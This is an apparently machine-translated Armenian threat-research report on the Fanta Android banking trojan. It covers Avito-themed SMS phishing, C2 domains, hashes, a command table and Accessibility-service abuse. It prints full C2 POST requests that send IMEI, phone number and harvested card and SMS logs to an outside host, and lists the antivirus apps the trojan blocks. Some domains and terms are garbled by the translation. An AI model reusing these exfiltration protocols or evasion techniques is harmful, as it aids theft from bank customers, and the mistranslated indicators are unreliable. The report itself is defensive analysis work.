Leysya, Fanta. նոր մարտավարություն հին Android Trojan-ի համար

Մի օր դուք ցանկանում եք ինչ-որ բան վաճառել Avito-ում և, տեղադրելով ձեր ապրանքի մանրամասն նկարագրությունը (օրինակ, RAM մոդուլ), դուք կստանաք այս հաղորդագրությունը.

Հղումը բացելուց հետո կտեսնեք մի անվնաս թվացող էջ, որը տեղեկացնում է ձեզ՝ երջանիկ և հաջողակ վաճառողին, որ գնում է կատարվել.

Երբ սեղմեք «Շարունակել» կոճակը, ձեր Android սարքում կներբեռնվի APK ֆայլ՝ պատկերակով և վստահություն ներշնչող անունով: Տեղադրեցիր մի հավելված, որը ինչ-ինչ պատճառներով պահանջում էր AccessibilityService իրավունքները, հետո մի երկու պատուհան հայտնվեց ու արագ անհետացավ ու... Վերջ։

Դուք գնում եք ստուգելու ձեր հաշվեկշիռը, բայց ինչ-ինչ պատճառներով ձեր բանկային հավելվածը կրկին խնդրում է ձեր քարտի տվյալները: Տվյալները մուտքագրելուց հետո ինչ-որ սարսափելի բան է տեղի ունենում՝ ինչ-ինչ պատճառներով ձեզ համար դեռևս անհասկանալի է, որ գումարը սկսում է անհետանալ ձեր հաշվից: Դուք փորձում եք լուծել խնդիրը, բայց ձեր հեռախոսը դիմադրում է. այն սեղմում է «Վերադառնալ» և «Տուն» ստեղները, չի անջատվում և թույլ չի տալիս ակտիվացնել անվտանգության որևէ միջոց: Արդյունքում դուք մնում եք առանց փողի, ձեր ապրանքը չի գնվել, դուք շփոթված եք և մտածում եք՝ ի՞նչ է պատահել։

Պատասխանը պարզ է՝ դուք դարձել եք Android Trojan Fanta-ի զոհը՝ Flexnet ընտանիքի անդամ: Ինչպե՞ս դա տեղի ունեցավ: Եկեք հիմա բացատրենք.

Հեղինակներ: Անդրեյ Պոլովինկինչարամիտ ծրագրերի վերլուծության կրտսեր մասնագետ, Իվան Պիսարև, չարամիտ ծրագրերի վերլուծության մասնագետ։

Որոշ վիճակագրություն

Android տրոյանների Flexnet ընտանիքի մասին առաջին անգամ հայտնի դարձավ 2015թ. Գործունեության բավականին երկար ժամանակահատվածում ընտանիքը ընդլայնվել է մի քանի ենթատեսակների մեջ՝ Fanta, Limebot, Lipton և այլն: Trojan-ը, ինչպես նաև դրա հետ կապված ենթակառուցվածքը կանգ չեն առնում. մշակվում են նոր արդյունավետ բաշխման սխեմաներ. վիրուսների գրառում - նոր գործառույթների ավելացում, որը հնարավորություն է տալիս ավելի արդյունավետ կերպով գումար գողանալ վարակված սարքերից և շրջանցել պաշտպանական մեխանիզմները:

Այս հոդվածում նկարագրված արշավն ուղղված է Ռուսաստանից եկած օգտատերերին, վարակված սարքերի փոքր քանակություն է գրանցվել Ուկրաինայում, իսկ ավելի քիչ՝ Ղազախստանում և Բելառուսում։

Թեև Flexnet-ը Android Trojan ասպարեզում է արդեն ավելի քան 4 տարի և մանրամասն ուսումնասիրվել է բազմաթիվ հետազոտողների կողմից, այն դեռ լավ վիճակում է: 2019 թվականի հունվարից սկսած վնասի հավանական չափը կազմում է ավելի քան 35 միլիոն ռուբլի, և դա միայն Ռուսաստանում արշավների համար է։ 2015 թվականին այս Android Trojan-ի տարբեր տարբերակներ վաճառվեցին ընդհատակյա ֆորումներում, որտեղ կարելի էր գտնել նաև տրոյականի սկզբնական կոդը՝ մանրամասն նկարագրությամբ։ Սա նշանակում է, որ վնասների վիճակագրությունն աշխարհում էլ ավելի տպավորիչ է։ Այդպիսի ծեր մարդու համար վատ ցուցանիշ չէ, այնպես չէ՞։

Վաճառքից մինչև խաբեություն

Ինչպես երևում է Avito գովազդ տեղադրելու ինտերնետ ծառայության ֆիշինգի էջի նախկինում ներկայացված սքրինշոթից, այն պատրաստվել է կոնկրետ զոհի համար: Ըստ երևույթին, հարձակվողներն օգտագործում են Avito-ի վերլուծիչներից մեկը, որը քաղում է վաճառողի հեռախոսահամարն ու անունը, ինչպես նաև ապրանքի նկարագրությունը։ Էջն ընդլայնելուց և APK ֆայլը պատրաստելուց հետո տուժողին ուղարկվում է SMS իր անունով և հղում դեպի ֆիշինգ էջի, որը պարունակում է իր ապրանքի նկարագրությունը և ապրանքի «վաճառքից» ստացված գումարը: Սեղմելով կոճակի վրա՝ օգտվողը ստանում է վնասակար APK ֆայլ՝ Fanta:

Shcet491[.]ru տիրույթի ուսումնասիրությունը ցույց է տվել, որ այն պատվիրակված է Hostinger-ի DNS սերվերներին.

• ns1.hostinger.ru
• ns2.hostinger.ru
• ns3.hostinger.ru
• ns4.hostinger.ru

Դոմեյն գոտու ֆայլը պարունակում է մուտքեր, որոնք ցույց են տալիս 31.220.23[.]236, 31.220.23[.]243 և 31.220.23[.]235 IP հասցեները: Այնուամենայնիվ, տիրույթի հիմնական ռեսուրսի գրառումը (A record) մատնանշում է 178.132.1 [.]240 IP հասցեով սերվերը:

IP հասցեն 178.132.1[.]240 գտնվում է Նիդեռլանդներում և պատկանում է հյուրընկալողին WorldStream. 31.220.23[.]235, 31.220.23[.]236 և 31.220.23[.]243 IP հասցեները գտնվում են Մեծ Բրիտանիայում և պատկանում են HOSTINGER ընդհանուր հոստինգ սերվերին: Օգտագործվում է որպես ձայնագրիչ openprov-ru. Հետևյալ տիրույթները նույնպես լուծվել են 178.132.1[.]240 IP հասցեով.

• sdelka-ru[.]ru
• թովառ-ավ[.]ռու
• ավ-տովար[.]ռու
• ru-sdelka[.]ru
• shcet382[.]ru
• sdelka221[.]ru
• sdelka211[.]ru
• vyplata437[.]ru
• viplata291[.]ru
• perevod273[.]ru
• perevod901[.]ru

Հարկ է նշել, որ հետևյալ ձևաչափով հղումները հասանելի էին գրեթե բոլոր տիրույթներից.

http://(www.){0,1}<%domain%>/[0-9]{7}

Այս ձևանմուշը ներառում է նաև հղում SMS հաղորդագրությունից: Պատմական տվյալների հիման վրա պարզվել է, որ մեկ տիրույթը համապատասխանում է վերը նկարագրված օրինաչափության մի քանի հղումների, ինչը ցույց է տալիս, որ մեկ տիրույթ օգտագործվել է տրոյականը մի քանի զոհերի բաժանելու համար։

Եկեք մի փոքր առաջ անցնենք. SMS-ից հղման միջոցով ներբեռնված տրոյան օգտագործում է հասցեն որպես կառավարման սերվեր: onusedseddohap[.]ակումբ. Այս տիրույթը գրանցվել է 2019-03-12-ին, և 2019-04-29-ից սկսած APK հավելվածները փոխազդում են այս տիրույթի հետ։ Հիմնվելով VirusTotal-ից ստացված տվյալների վրա՝ ընդհանուր առմամբ 109 հավելված համագործակցել է այս սերվերի հետ: Դոմենն ինքնին լուծվել է IP հասցեով 217.23.14 [.]27, որը գտնվում է Նիդեռլանդներում և պատկանում է հյուրընկալողին WorldStream. Օգտագործվում է որպես ձայնագրիչ անունէժան. Դոմենները նույնպես լուծվել են այս IP հասցեով bad-racoon[.]ակումբ (սկսած 2018-09-25) և bad-racoon[.]ապրում (սկսած 2018-10-25թթ.): Դոմեյնով bad-racoon[.]ակումբ ավելի քան 80 APK ֆայլերի հետ փոխգործակցված bad-racoon[.]ապրում - ավելի քան 100:

Ընդհանուր առմամբ, հարձակումն ընթանում է հետևյալ կերպ.

Ի՞նչ կա Fanta-ի կափարիչի տակ:

Ինչպես շատ այլ Android Trojan-ներ, Fanta-ն ի վիճակի է կարդալ և ուղարկել SMS հաղորդագրություններ, կատարել USSD հարցումներ և ցուցադրել իր սեփական պատուհանները հավելվածների (ներառյալ բանկային) վերևում: Այնուամենայնիվ, այս ընտանիքի ֆունկցիոնալության զինանոցը հասել է. Fanta-ն սկսեց օգտագործել Մատչելիության ծառայություն տարբեր նպատակներով՝ կարդալ այլ հավելվածներից ծանուցումների բովանդակությունը, կանխել վարակված սարքի վրա տրոյականի հայտնաբերումը և գործարկումը և այլն: Fanta-ն աշխատում է 4.4-ից ոչ փոքր Android-ի բոլոր տարբերակների վրա: Այս հոդվածում մենք ավելի մանրամասն կանդրադառնանք Fanta-ի հետևյալ նմուշին.

• MD5: 0826bd11b2c130c4c8ac137e395ac2d4
• SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
• SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Գործարկումից անմիջապես հետո

Գործարկումից անմիջապես հետո տրոյան թաքցնում է իր պատկերակը: Հավելվածը կարող է աշխատել միայն այն դեպքում, եթե վարակված սարքի անունը ցանկում չկա.

• android_x86
• VirtualBox- ը
• Nexus 5X (ցուլգլուխ)
• Nexus 5 (ածելի)

Այս ստուգումն իրականացվում է Trojan-ի հիմնական ծառայության մեջ. MainService. Առաջին անգամ գործարկվելիս հավելվածի կազմաձևման պարամետրերը սկզբնավորվում են լռելյայն արժեքներով (կազմաձևման տվյալների պահպանման ձևաչափը և դրանց նշանակությունը կքննարկվեն ավելի ուշ), և նոր վարակված սարքը գրանցվում է կառավարման սերվերում: Հաղորդագրության տեսակով HTTP POST հարցումը կուղարկվի սերվեր register_bot և վարակված սարքի մասին տեղեկատվություն (Android տարբերակ, IMEI, հեռախոսահամար, օպերատորի անունը և երկրի կոդը, որտեղ գրանցված է օպերատորը): Հասցեն ծառայում է որպես կառավարման սերվեր hXXp://onuseseddohap[.]club/controller.php. Ի պատասխան՝ սերվերը դաշտերը պարունակող հաղորդագրություն է ուղարկում bot_id, bot_pwd, սերվեր — հավելվածը պահպանում է այս արժեքները որպես CnC սերվերի պարամետրեր: Պարամետր սերվեր կամընտիր, եթե դաշտը չի ստացվել. Fanta-ն օգտագործում է գրանցման հասցեն. hXXp://onuseseddohap[.]club/controller.php. CnC հասցեն փոխելու գործառույթը կարող է օգտագործվել երկու խնդիր լուծելու համար՝ բեռը հավասարաչափ բաշխել մի քանի սերվերների միջև (եթե կան մեծ թվով վարակված սարքեր, ապա չօպտիմիզացված վեբ սերվերի բեռը կարող է մեծ լինել), ինչպես նաև օգտագործել։ այլընտրանքային սերվեր CnC սերվերներից մեկի ձախողման դեպքում:

Եթե ​​հարցումն ուղարկելիս սխալ առաջանա, տրոյականը կկրկնի գրանցման գործընթացը 20 վայրկյան հետո:

Սարքը հաջողությամբ գրանցվելուց հետո Fanta-ն օգտվողին կցուցադրի հետևյալ հաղորդագրությունը.

Կարևոր նշում՝ ծառայությունը զանգահարեց Համակարգի անվտանգություն — տրոյական ծառայության անվանումը և կոճակը սեղմելուց հետո OK Վարակված սարքի Մատչելիության կարգավորումներով պատուհան կբացվի, որտեղ օգտատերը պետք է տրամադրի Մատչելիության իրավունքներ վնասակար ծառայության համար.

Հենց որ օգտատերը միանա Մատչելիության ծառայություն, Fanta-ն մուտք է ստանում հավելվածի պատուհանների բովանդակությունը և դրանցում կատարված գործողությունները.

Մատչելիության իրավունքները ստանալուց անմիջապես հետո տրոյականը պահանջում է ադմինիստրատորի իրավունքներ և իրավունքներ կարդալու ծանուցումները.

Օգտվելով AccessibilityService-ից՝ հավելվածը նմանակում է ստեղնաշարերը՝ դրանով իսկ իրեն տալով բոլոր անհրաժեշտ իրավունքները:

Fanta-ն ստեղծում է տվյալների բազայի մի քանի օրինակներ (որոնք կնկարագրվեն ավելի ուշ), որոնք անհրաժեշտ են կոնֆիգուրացիայի տվյալները պահելու համար, ինչպես նաև վարակված սարքի վերաբերյալ հավաքագրված տեղեկատվությունը: Հավաքված տեղեկատվությունը ուղարկելու համար տրոյան ստեղծում է կրկնվող առաջադրանք, որը նախատեսված է տվյալների բազայից դաշտերը ներբեռնելու և վերահսկիչ սերվերից հրաման ստանալու համար: CnC մուտք գործելու միջակայքը սահմանվում է կախված Android տարբերակից՝ 5.1-ի դեպքում միջակայքը կլինի 10 վայրկյան, հակառակ դեպքում՝ 60 վայրկյան։

Հրամանը ստանալու համար Ֆանտան հարցում է անում GetTask կառավարման սերվերին: Ի պատասխան՝ CnC-ն կարող է ուղարկել հետևյալ հրամաններից մեկը.

Թիմ	Նկարագրություն
0	Ուղարկեք SMS հաղորդագրություն
1	Կատարեք հեռախոսազանգ կամ USSD հրաման
2	Թարմացնում է պարամետրը ընդմիջում
3	Թարմացնում է պարամետրը կանգնեցնել
6	Թարմացնում է պարամետրը smsManager
9	Սկսեք հավաքել SMS հաղորդագրություններ
11	Վերականգնել ձեր հեռախոսը գործարանային կարգավորումներին
12	Միացնել/անջատել երկխոսության տուփի ստեղծման գրանցումը

Fanta-ն նաև հավաքում է ծանուցումներ 70 բանկային հավելվածներից, արագ վճարման համակարգերից և էլեկտրոնային դրամապանակներից և պահում դրանք տվյալների բազայում:

Կազմաձևման պարամետրերի պահպանում

Կազմաձևման պարամետրերը պահելու համար Fanta-ն օգտագործում է ստանդարտ մոտեցում Android պլատֆորմի համար. նախապատվություններ- ֆայլեր. Պարամետրերը կպահվեն անունով ֆայլում Կառավարում. Պահպանված պարամետրերի նկարագրությունը ներկայացված է ստորև բերված աղյուսակում:

անուն	Կանխադրված արժեք	Հնարավոր արժեքներ	Նկարագրություն
id	0	Ամբողջական	Բոտի ID
սերվեր	hXXp://onuseseddohap[.]club/	URL	Վերահսկեք սերվերի հասցեն
հզ	-	String	Սերվերի գաղտնաբառը
ընդմիջում	20	Ամբողջական	Ժամանակի ընդմիջում. Նշում է, թե որքան ժամանակով պետք է հետաձգվեն հետևյալ առաջադրանքները. Ուղարկված SMS հաղորդագրության կարգավիճակի վերաբերյալ հարցում ուղարկելիս Կառավարման սերվերից նոր հրամանի ստացում
կանգնեցնել	բոլորը	բոլոր/հեռահամար	Եթե ​​դաշտը հավասար է լարին բոլորը կամ հեռահամար, ապա ստացված SMS հաղորդագրությունը կհայտնվի հավելվածի կողմից և չի ցուցադրվի օգտատիրոջը
smsManager	0	0/1	Միացնել/անջատել հավելվածը որպես SMS-ի կանխադրված ստացող
readDialog	սուտ	Ճիշտ է կեղծ է	Միացնել/անջատել իրադարձությունների գրանցումը Մատչելիության իրադարձություն

Fanta-ն նույնպես օգտագործում է ֆայլը smsManager:

անուն	Կանխադրված արժեք	Հնարավոր արժեքներ	Նկարագրություն
pckg	-	String	Օգտագործված SMS հաղորդագրությունների կառավարչի անունը

Փոխազդեցություն տվյալների բազաների հետ

Իր գործունեության ընթացքում տրոյան օգտագործում է երկու տվյալների բազա։ Տվյալների բազան անվանվել է a օգտագործվում է հեռախոսից հավաքված տարբեր տեղեկություններ պահելու համար: Երկրորդ տվյալների բազան կոչվում է fanta.db և օգտագործվում է պահելու կարգավորումները, որոնք պատասխանատու են ֆիշինգի պատուհանների ստեղծման համար, որոնք նախատեսված են բանկային քարտերի մասին տեղեկություններ հավաքելու համար:

Trojan-ն օգտագործում է տվյալների բազան а հավաքագրված տեղեկատվությունը պահելու և ձեր գործողությունները գրանցելու համար: Տվյալները պահվում են աղյուսակում տեղեկամատյանները. Աղյուսակ ստեղծելու համար օգտագործեք հետևյալ SQL հարցումը.

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Տվյալների բազան պարունակում է հետևյալ տեղեկատվությունը.

1. Վարակված սարքի գործարկման գրանցումը հաղորդագրությամբ Հեռախոսը միացվեց!

2. Ծանուցումներ հավելվածներից։ Հաղորդագրությունը ստեղծվում է հետևյալ ձևանմուշի համաձայն.

(<%App Name%>)<%Title%>: <%Notification text%>

3. Բանկային քարտի տվյալները տրոյականի կողմից ստեղծված ֆիշինգի ձևերից: Պարամետր VIEW_NAME կարող է լինել հետևյալներից մեկը.

• AliExpress
• Ավիտոն
• Google Play
• Տարբեր <%App Name%>

Հաղորդագրությունը մուտքագրված է ձևաչափով.

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Մուտքային/ելքային SMS հաղորդագրություններ՝ ձևաչափով.

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Տեղեկություններ փաթեթի մասին, որը ստեղծում է երկխոսության տուփը ձևաչափով.

(<%Package name%>)<%Package information%>

Օրինակ աղյուսակ տեղեկամատյանները:

Fanta-ի գործառույթներից մեկը բանկային քարտերի մասին տեղեկատվության հավաքումն է: Տվյալների հավաքագրումը տեղի է ունենում բանկային հավելվածներ բացելիս ֆիշինգի պատուհանների ստեղծման միջոցով: Տրոյանը ստեղծում է ֆիշինգի պատուհանը միայն մեկ անգամ: Տեղեկատվությունը, որ պատուհանը ցուցադրվել է օգտագործողին, պահվում է աղյուսակում Կառավարում տվյալների բազայում fanta.db. Տվյալների բազա ստեղծելու համար օգտագործեք հետևյալ SQL հարցումը.

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Սեղանի բոլոր դաշտերը Կառավարում լռելյայն սկզբնավորվել է 1-ի (ստեղծել ֆիշինգի պատուհան): Օգտագործողի տվյալները մուտքագրելուց հետո արժեքը կսահմանվի 0: Աղյուսակի դաշտերի օրինակ Կառավարում:

• can_login — դաշտը պատասխանատու է բանկային հավելված բացելիս ձևը ցուցադրելու համար
• first_bank - չօգտագործված
• can_avito — դաշտը պատասխանատու է Avito հավելվածը բացելիս ձևը ցուցադրելու համար
• can_ali — դաշտը պատասխանատու է Aliexpress հավելվածը բացելիս ձևը ցուցադրելու համար
• կարող է_մյուս — դաշտը պատասխանատու է ցանկից որևէ հավելված բացելիս ձևը ցուցադրելու համար. Yula, Pandao, Drom Auto, Դրամապանակ: Զեղչի և բոնուսային քարտեր, Aviasales, Booking, Trivago
• can_card — դաշտը պատասխանատու է ձևը բացելիս ցուցադրելու համար Google Play

Փոխազդեցություն կառավարման սերվերի հետ

Ցանցի փոխազդեցությունը կառավարման սերվերի հետ տեղի է ունենում HTTP արձանագրության միջոցով: Ցանցի հետ աշխատելու համար Fanta-ն օգտագործում է հանրահայտ Retrofit գրադարանը: Հարցումները ուղարկվում են՝ hXXp://onuseseddohap[.]club/controller.php. Սերվերի հասցեն կարող է փոխվել սերվերում գրանցվելիս: Քուքիները կարող են ուղարկվել ի պատասխան սերվերից: Fanta-ն կատարում է հետևյալ հարցումները սերվերին.

• Բոտի գրանցումը կառավարման սերվերում տեղի է ունենում մեկ անգամ՝ առաջին գործարկումից հետո: Վարակված սարքի վերաբերյալ հետևյալ տվյալները ուղարկվում են սերվեր.
  · Բուլկի — սերվերից ստացված թխուկներ (կանխադրված արժեքը դատարկ տող է)
  · ռեժիմ - լարային հաստատուն register_bot
  · հաստատել - ամբողջ թվի հաստատուն 2
  · version_sdk — ձևավորվում է հետևյալ ձևանմուշով. <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
  · IMEI — Վարակված սարքի IMEI
  · երկիր - երկրի կոդը, որտեղ օպերատորը գրանցված է, ISO ձևաչափով
  · թիվ - հեռախոսահամար
  · օպերատոր - օպերատորի անունը

  Սերվերին ուղարկված հարցման օրինակ.

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 144
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
  

  Հարցմանը ի պատասխան՝ սերվերը պետք է վերադարձնի JSON օբյեկտ, որը պարունակում է հետևյալ պարամետրերը.
  · bot_id — վարակված սարքի ID. Եթե ​​bot_id-ը հավասար է 0-ի, Fanta-ն նորից կկատարի հարցումը:
  bot_pwd — գաղտնաբառ սերվերի համար:
  սերվեր - վերահսկել սերվերի հասցեն: Ընտրովի պարամետր: Եթե ​​պարամետրը նշված չէ, ապա կօգտագործվի հավելվածում պահպանված հասցեն:

  Օրինակ JSON օբյեկտ.

  {
      "response":[
     	 {
     		 "bot_id": <%BOT_ID%>,
     		 "bot_pwd": <%BOT_PWD%>,
     		 "server": <%SERVER%>
     	 }
      ],
      "status":"ok"
  }

• Սերվերից հրաման ստանալու հարցում: Հետևյալ տվյալները ուղարկվում են սերվեր.
  · Բուլկի — սերվերից ստացված թխուկներ
  · հայտ — վարակված սարքի id-ն, որը ստացվել է հարցումն ուղարկելիս register_bot
  · հզ - գաղտնաբառ սերվերի համար
  · divice_admin — դաշտը որոշում է, թե արդյոք ձեռք են բերվել ադմինիստրատորի իրավունքները: Եթե ​​ադմինիստրատորի իրավունքները ձեռք են բերվել, ապա դաշտը հավասար է 1, հակառակ դեպքում 0
  · Մատչելիությունը — Մատչելիության ծառայության գործունեության կարգավիճակը: Եթե ​​ծառայությունը սկսվել է, արժեքը 1, հակառակ դեպքում 0
  · SMS մենեջեր — ցույց է տալիս, թե արդյոք Trojan-ը միացված է որպես SMS ստանալու լռելյայն հավելված
  · էկրան — ցուցադրում է էկրանի վիճակը: Արժեքը կսահմանվի 1, եթե էկրանը միացված է, հակառակ դեպքում 0;

  Սերվերին ուղարկված հարցման օրինակ.

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

  Կախված հրամանից՝ սերվերը կարող է վերադարձնել JSON օբյեկտ՝ տարբեր պարամետրերով.

  · Թիմ Ուղարկեք SMS հաղորդագրությունՊարամետրերը պարունակում են հեռախոսահամարը, SMS հաղորդագրության տեքստը և ուղարկվող հաղորդագրության ID-ն: Նույնացուցիչն օգտագործվում է տիպով սերվերին հաղորդագրություն ուղարկելիս setSmsStatus.

  {
      "response":
      [
     	 {
     		 "mode": 0,
     		 "sms_number": <%SMS_NUMBER%>,
     		 "sms_text": <%SMS_TEXT%>,
     		 "sms_id": %SMS_ID%
     	 }
      ],
      "status":"ok"
  }

  · Թիմ Կատարեք հեռախոսազանգ կամ USSD հրամանՀեռախոսահամարը կամ հրամանը գալիս է պատասխան մարմնում:

  {
      "response":
      [
     	 {
     		 "mode": 1,
     		 "command": <%TEL_NUMBER%>
     	 }
      ],
      "status":"ok"
  }

  · Թիմ Փոխել միջակայքի պարամետրը.

  {
      "response":
      [
     	 {
     		 "mode": 2,
     		 "interval": <%SECONDS%>
     	 }
      ],
      "status":"ok"
  }

  · Թիմ Փոխել ընդհատման պարամետրը.

  {
      "response":
      [
     	 {
     		 "mode": 3,
     		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
     	 }
      ],
      "status":"ok"
  }

  · Թիմ Փոխեք SmsManager դաշտը.

  {
      "response":
      [
     	 {
     		 "mode": 6,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

  · Թիմ Հավաքեք SMS հաղորդագրություններ վարակված սարքից.

  {
      "response":
      [
     	 {
     		 "mode": 9
     	 }
      ],
      "status":"ok"
  }

  · Թիմ Վերականգնել ձեր հեռախոսը գործարանային կարգավորումներին:

  {
      "response":
      [
     	 {
     		 "mode": 11
     	 }
      ],
      "status":"ok"
  }

  · Թիմ Փոխեք ReadDialog պարամետրը.

  {
      "response":
      [
     	 {
     		 "mode": 12,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

• Հաղորդագրություն ուղարկելով տիպով setSmsStatus. Այս հարցումը կատարվում է հրամանի կատարումից հետո Ուղարկեք SMS հաղորդագրություն. Հարցումն այսպիսի տեսք ունի.

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

• Տվյալների բազայի բովանդակության բեռնում: Մեկ տող փոխանցվում է յուրաքանչյուր հարցում: Հետևյալ տվյալները ուղարկվում են սերվեր.
  · Բուլկի — սերվերից ստացված թխուկներ
  · ռեժիմ - լարային հաստատուն setSaveInboxSms
  · հայտ — վարակված սարքի id-ն, որը ստացվել է հարցումն ուղարկելիս register_bot
  · տեքստ — տեքստը տվյալների բազայի ընթացիկ գրառումում (դաշտ d սեղանից տեղեկամատյանները տվյալների բազայում а)
  · թիվ - տվյալների բազայի ընթացիկ գրառումի անվանումը (դաշտ p սեղանից տեղեկամատյանները տվյալների բազայում а)
  · sms_mode - ամբողջ արժեք (դաշտ m սեղանից տեղեկամատյանները տվյալների բազայում а)

  Հարցումն այսպիսի տեսք ունի.

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

  Եթե ​​հաջողությամբ ուղարկվի սերվեր, տողը կջնջվի աղյուսակից: Սերվերի կողմից վերադարձված JSON օբյեկտի օրինակ.

  {
      "response":[],
      "status":"ok"
  }

Փոխազդեցություն AccessibilityService-ի հետ

AccessibilityService-ն իրականացվել է հաշմանդամություն ունեցող անձանց համար Android սարքերի օգտագործման հեշտացման համար: Շատ դեպքերում ֆիզիկական փոխազդեցությունը պահանջվում է հավելվածի հետ փոխազդելու համար: AccessibilityService-ը թույլ է տալիս դրանք կատարել ծրագրային եղանակով: Fanta-ն օգտագործում է ծառայությունը բանկային հավելվածներում կեղծ պատուհաններ ստեղծելու և օգտատերերի կողմից համակարգի կարգավորումները և որոշ հավելվածներ բացելու հնարավորությունը կանխելու համար:

Օգտագործելով AccessibilityService-ի ֆունկցիոնալությունը՝ Trojan-ը վերահսկում է վարակված սարքի էկրանի տարրերի փոփոխությունները: Ինչպես նախկինում նկարագրված է, Fanta-ի կարգավորումները պարունակում են պարամետր, որը պատասխանատու է երկխոսության տուփերով գրանցման գործողությունների համար. readDialog. Եթե ​​այս պարամետրը սահմանված է, ապա տվյալների բազայում կավելացվի տեղեկատվություն փաթեթի անվան և նկարագրության մասին, որը գործարկեց իրադարձությունը: Տրոյանը կատարում է հետևյալ գործողությունները, երբ իրադարձությունները գործարկվում են.

• Նմանակում է հետևի և տան ստեղների սեղմումը հետևյալ դեպքերում.
  · եթե օգտագործողը ցանկանում է վերագործարկել իր սարքը
  · եթե օգտվողը ցանկանում է ջնջել «Avito» հավելվածը կամ փոխել մուտքի իրավունքները
  · եթե էջում նշված է «Avito» հավելվածը
  · Google Play Protect հավելվածը բացելիս
  · AccessibilityService-ի կարգավորումներով էջեր բացելիս
  · երբ հայտնվում է System Security երկխոսության տուփը
  · «Նկարել այլ հավելվածի վրայով» կարգավորումներով էջը բացելիս
  · «Հավելվածներ» էջը բացելիս՝ «Վերականգնում և վերակայում», «Տվյալների վերականգնում», «Վերականգնել կարգավորումները», «Մշակողների վահանակ», «Հատուկ. հնարավորություններ», «Հատուկ հնարավորություններ», «Հատուկ իրավունքներ»
  · եթե իրադարձությունը ստեղծվել է որոշակի հավելվածների կողմից:

  Դիմումների ցանկ

  • Android
  • Master Lite
  • Մաքուր վարպետ
  • Clean Master x86 CPU-ի համար
  • Meizu հավելվածի թույլտվության կառավարում
  • MIUI անվտանգություն
  • Մաքուր վարպետ - հակավիրուսային և քեշ և աղբ մաքրող միջոց
  • Ծնողական հսկողություն և GPS. Kaspersky SafeKids
  • Kaspersky Antivirus AppLock և Web Security Beta
  • Վիրուս մաքրող, հակավիրուսային, մաքրող միջոց (MAX Security)
  • Mobile Antivirus Security PRO
  • Avast հակավիրուսային և անվճար պաշտպանություն 2019 թ
  • Mobile Security MegaFon
  • AVG պաշտպանություն Xperia-ի համար
  • Բջջային անվտանգություն
  • Malwarebytes հակավիրուսային և պաշտպանություն
  • Հակավիրուսային Android 2019-ի համար
  • Անվտանգության վարպետ - հակավիրուսային, VPN, AppLock, Booster
  • AVG հակավիրուսային համակարգ Huawei պլանշետի համակարգի կառավարչի համար
  • Samsung-ի հասանելիություն
  • Samsung Smart Manager
  • Անվտանգության վարպետ
  • Արագության ուժեղացուցիչ
  • Dr.Web
  • Dr.Web անվտանգության տարածք
  • Dr.Web Mobile Control Center
  • Dr.Web Security Space Life
  • Dr.Web Mobile Control Center
  • Հակավիրուսային և բջջային անվտանգություն
  • Kaspersky Internet Security. հակավիրուսային և պաշտպանություն
  • Kaspersky մարտկոցի ժամկետը. խնայող և ուժեղացուցիչ
  • Kaspersky Endpoint Security - պաշտպանություն և կառավարում
  • AVG հակավիրուսային անվճար 2019 – Պաշտպանություն Android-ի համար
  • Հակավիրուսային Android
  • Norton Mobile Security և հակավիրուսային
  • Հակավիրուսային, firewall, VPN, բջջային անվտանգություն
  • Բջջային անվտանգություն՝ հակավիրուսային, VPN, պաշտպանություն գողությունից
  • Հակավիրուսային Android-ի համար

• Եթե ​​կարճ համարին SMS հաղորդագրություն ուղարկելիս թույլտվություն է պահանջվում, Fanta-ն նմանակում է վանդակի վրա սեղմելը Հիշեք ընտրությունը և կոճակը ուղարկել.
• Երբ փորձում եք խլել ադմինիստրատորի իրավունքները Trojan-ից, այն կողպում է հեռախոսի էկրանը:
• Կանխում է նոր ադմինիստրատորների ավելացումը:
• Եթե ​​հակավիրուսային հավելվածը dr.web հայտնաբերել է սպառնալիք, Fanta-ն ընդօրինակում է կոճակը սեղմելը անտեսել.
• Trojan-ը նմանակում է ետ և տուն կոճակը սեղմելը, եթե իրադարձությունը ստեղծվել է հավելվածի կողմից Samsung Սարքի խնամք.
